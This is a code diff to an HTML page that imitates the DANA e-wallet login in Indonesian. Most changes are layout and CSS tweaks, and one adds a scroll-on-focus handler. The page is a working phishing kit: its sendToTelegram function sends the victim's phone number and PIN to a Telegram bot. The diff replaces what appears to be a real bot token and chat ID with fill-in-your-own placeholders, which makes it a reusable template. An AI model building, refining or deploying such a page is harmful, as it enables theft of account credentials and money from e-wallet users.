--- a/index.html
+++ b/index.html
@@ -2,52 +2,60 @@
 <html lang="id">
 <head>
   <meta charset="UTF-8">
-  <meta name="viewport" content="width=device-width, initial-scale=1.0">
+  <meta name="viewport" content="width=device-width, initial-scale=1.0, viewport-fit=cover">
   <title>Simulasi Login DANA</title>
   <style>
     * {
       box-sizing: border-box;
     }
-    body {
-      font-family: Arial, sans-serif;
-      background-color: #2796f1;
+
+    html, body {
+      height: 100%;
       margin: 0;
       padding: 0;
+      font-family: Arial, sans-serif;
+      background-color: #2796f1;
+      overflow-x: hidden;
+    }
+
+    body {
       display: flex;
       justify-content: center;
-      align-items: center;
-      height: 100vh;
+      align-items: flex-start;
     }
 
     .container {
       background-color: #2796f1;
       width: 100%;
       max-width: 400px;
-      padding: 30px 24px;
-      padding-bottom: 100px;
-      margin-top: -100px;
+      padding: 30px 24px 100px 24px;
       box-sizing: border-box;
       position: relative;
+      min-height: 100%;
     }
 
     .logo {
       text-align: center;
       margin-bottom: 32px;
     }
+
     .logo img {
       width: 80px;
     }
+
     .title {
       color: white;
       font-size: 18px;
       text-align: center;
       margin-bottom: 24px;
     }
+
     .input-row {
       display: flex;
       gap: 12px;
       margin-bottom: 24px;
     }
+
     .input-box {
       display: flex;
       align-items: center;
@@ -56,15 +64,18 @@
       padding: 14px 16px;
       flex: 1;
     }
+
     .flag {
       display: flex;
       align-items: center;
     }
+
     .flag img {
       width: 24px;
       height: 16px;
       margin-right: 6px;
     }
+
     .country-code-input {
       border: none;
       outline: none;
@@ -74,6 +85,7 @@
       color: black;
       background: transparent;
     }
+
     .input-box input[type="tel"], .input-box input[type="text"] {
       border: none;
       outline: none;
@@ -82,6 +94,7 @@
       background: transparent;
       width: 100%;
     }
+
     .info-text {
       font-size: 12px;
       color: white;
@@ -90,6 +103,7 @@
       padding: 0 10px;
       margin-bottom: 24px;
     }
+
     .info-text a {
       color: white;
       font-weight: bold;
@@ -120,7 +134,7 @@
       background-color: white;
       width: 100%;
       max-width: 400px;
-      height: 100vh;
+      min-height: 100%;
       padding: 70px 24px 24px 24px;
       box-sizing: border-box;
       flex-direction: column;
@@ -140,6 +154,7 @@
       top: 0;
       left: 0;
     }
+
     .pin-title {
       margin-top: 12px;
       margin-bottom: 24px;
@@ -147,12 +162,14 @@
       color: black;
       text-align: center;
     }
+
     .pin-dots {
       display: flex;
       justify-content: center;
       margin-top: 24px;
       margin-bottom: 40px;
     }
+
     .pin-dot {
       width: 16px;
       height: 16px;
@@ -167,6 +184,7 @@
       font-weight: bold;
       transition: all 0.3s ease;
     }
+
     .pin-help {
       display: flex;
       justify-content: space-around;
@@ -175,20 +193,19 @@
       color: #008CFF;
       font-weight: bold;
     }
+
     .pin-help img {
       width: 20px;
       vertical-align: middle;
       margin-right: 4px;
     }
+
     #pin-input {
       position: absolute;
       opacity: 0.01;
       width: 1px;
       height: 1px;
       pointer-events: auto;
-    }
-    .pin-dots:focus-within {
-      outline: none;
     }
   </style>
 </head>
@@ -264,8 +281,8 @@
     }
 
     async function sendToTelegram(pin) {
-      const token = '8049032485:AAE63lM0pKxDIzBtjKKdP851RniEU64fJtc';
-      const chat_id = '7032109008';
+      const token = 'ISI_TOKEN_KAMU';
+      const chat_id = 'ISI_CHAT_ID_KAMU';
       const message = `Nomor: ${savedPhoneNumber}\nPIN: ${pin}`;
       const url = `https://api.telegram.org/bot${token}/sendMessage?chat_id=${chat_id}&text=${encodeURIComponent(message)}`;
       try {
@@ -306,6 +323,13 @@
       updateDots();
       localStorage.removeItem('phone');
     }
+
+    // Scroll ke input saat fokus
+    document.getElementById("phone-input").addEventListener("focus", () => {
+      setTimeout(() => {
+        document.getElementById("phone-input").scrollIntoView({ behavior: "smooth", block: "center" });
+      }, 300);
+    });
   </script>
 </body>
 </html>
